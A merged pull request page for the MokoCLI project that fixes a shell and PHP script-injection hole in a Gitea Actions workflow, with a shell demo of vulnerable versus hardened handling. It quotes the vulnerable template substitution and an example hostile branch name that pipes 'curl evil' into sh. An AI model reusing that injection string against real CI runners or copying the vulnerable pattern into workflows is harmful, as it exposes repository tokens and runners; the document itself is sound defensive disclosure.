fix(security): prevent script injection in rc-revert workflow #324

Merged
jmiller merged 2 commits from feature/harden-rc-revert-injection into dev 2026-06-27 02:32:27 +00:00
Owner

Security fix — GitHub/Gitea Actions script injection (HIGH)

.mokogitea/workflows/rc-revert.yml substituted the attacker-controlled PR head branch ref directly into shell:

BRANCH="${{ github.event.pull_request.head.ref }}"   # template-substituted into shell source
...
ENCODED=$(php -r "echo rawurlencode('${BRANCH}');")  # second injection (PHP)

Git permits chars like `, $, (, ), ;, " in branch names, so a PR from a branch such as rc/";curl evil|sh;" executes arbitrary commands in the runner — with secrets.MOKOGITEA_TOKEN (branch create/delete API access) in scope. Flagged HIGH by automated security review.

Fix

  • Untrusted values passed via env: (BRANCH/REPO/GITEA_URL/TOKEN) — available only as already-parsed shell variables, never rendered into workflow shell source.
  • Strict allowlist ^rc/[A-Za-z0-9._/-]+$ rejects anything unexpected before use.
  • PHP reads the value with getenv("BRANCH") instead of string interpolation (closes the second injection).
  • set -euo pipefail added.

Behaviour is unchanged for legitimate rc/<name> branches. The identical inherited copy in mokogitea-private has been hardened the same way.
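The bug class and the fix described above, as an added example in plain shell (not the MokoCLI `rc-revert.yml` itself). `vulnerable_step` simulates what the runner does when `${{ github.event.pull_request.head.ref }}` is rendered into a `run:` block; `hardened_step` models the fixed shape, where the value arrives through the environment and is allowlisted before use. The function names, `valid_rc_branch` (the `^rc/[A-Za-z0-9._/-]+$` allowlist written as POSIX `case` patterns so it runs under `sh`), a pure-shell `urlencode` standing in for the PHP `rawurlencode(getenv("BRANCH"))` call, and the branch names are all constructed for this example; no Gitea API is called.

```shell
#!/bin/sh
# Added example, not the MokoCLI rc-revert.yml itself. It reproduces the bug
# class in plain shell: a PR head ref rendered into the script text (as
# ${{ github.event.pull_request.head.ref }} is) becomes shell source, while the
# same value read from the environment (as with env:) stays data. The branch
# names below are constructed test inputs; no Gitea API is called.
# (The workflow uses `set -euo pipefail` under bash; pipefail is omitted here
# only so the example stays POSIX sh.)
set -eu

# Allowlist from the fix: ^rc/[A-Za-z0-9._/-]+$, written as POSIX case patterns
# so it also works in sh. Returns 0 for an acceptable ref, 1 otherwise.
valid_rc_branch() {
  case "$1" in
    rc/?*) ;;                         # must start with rc/ and have something after it
    *) return 1 ;;
  esac
  case "${1#rc/}" in
    *[!A-Za-z0-9._/-]*) return 1 ;;   # any character outside the allowlist (newline included)
  esac
  return 0
}

# Percent-encodes one path segment (RFC 3986 unreserved characters pass through).
# Stand-in for the php rawurlencode(getenv("BRANCH")) call in the fixed workflow.
urlencode() {
  s="$1"; out=""
  while [ -n "$s" ]; do
    c="${s%"${s#?}"}"; s="${s#?}"     # peel off the first character
    case "$c" in
      [A-Za-z0-9.~_-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;
    esac
  done
  printf '%s' "$out"
}

# The vulnerable shape: the runner substitutes the expression into the run:
# block BEFORE the shell parses it, so the quotes in the script cannot help.
vulnerable_step() {
  script='BRANCH="'"$1"'"; echo "reverting ${BRANCH}"'
  sh -c "$script" 2>/dev/null || echo "step exited $?"
}

# The hardened shape: BRANCH arrives already parsed (env:), is allowlisted
# before any use, and every derived string is built from it as data.
hardened_step() {
  if ! valid_rc_branch "${BRANCH-}"; then
    printf 'refusing unexpected head ref: %s\n' "${BRANCH-}" >&2
    return 1
  fi
  printf 'renaming %s back to dev/%s via branches/%s\n' \
    "$BRANCH" "${BRANCH#rc/}" "$(urlencode "$BRANCH")"
}

# Constructed inputs: a legitimate release-candidate branch and a hostile one
# (a harmless echo stands in for curl evil|sh).
GOOD='rc/1.2.3'
EVIL='rc/";echo INJECTED;"'

vulnerable_step "$GOOD"
vulnerable_step "$EVIL"                       # prints INJECTED: the ref ran as code
BRANCH="$GOOD" hardened_step
BRANCH="$EVIL" hardened_step || echo "rejected (exit $?)"
```

In the workflow the `BRANCH="$EVIL" hardened_step` line corresponds to putting the `${{ ... }}` expression under the step's `env:` key and referencing `"$BRANCH"` inside `run:`; the expression is then expanded by the runner into an environment variable, never into script text. Under bash the allowlist can equally be `[[ "$BRANCH" =~ ^rc/[A-Za-z0-9._/-]+$ ]]`; the `case` form above is used only so the example runs under plain `sh`, and it rejects a newline anywhere in the value, which a line-oriented `grep` check would not.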

jmiller added 2 commits 2026-06-27 02:31:03 +00:00
fix(security): prevent shell/PHP script injection in rc-revert workflow
Universal: Auto Version Bump / Version Bump (push) Successful in 8s
5885797728
The PR head branch ref is attacker-controlled and was substituted via
${{ }} directly into the shell run block (and interpolated into php -r),
allowing command injection with secrets.MOKOGITEA_TOKEN in scope.

- Pass untrusted values through env (BRANCH/REPO/GITEA_URL/TOKEN), not
  ${{ }} template substitution into shell source
- Strict allowlist ^rc/[A-Za-z0-9._/-]+$ before any use
- PHP reads BRANCH via getenv() instead of string interpolation
chore(version): auto-bump patch 09.38.05-dev [skip ci]
RC Revert / Rename rc/ back to dev/ (pull_request) Has been skipped
Branch Cleanup / Delete merged branch (pull_request) Successful in 2s
3972b91169
jmiller merged commit 282a56258c into dev 2026-06-27 02:32:27 +00:00
jmiller deleted branch feature/harden-rc-revert-injection 2026-06-27 02:32:27 +00:00

Reference: MokoConsulting/MokoCLI#324